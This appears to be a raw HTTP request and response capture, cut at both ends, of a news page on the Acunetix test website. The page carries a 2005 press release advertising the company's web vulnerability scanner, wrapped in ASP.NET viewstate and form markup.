ICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:21 GMT Content-Length: 30429Response body (30429 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate 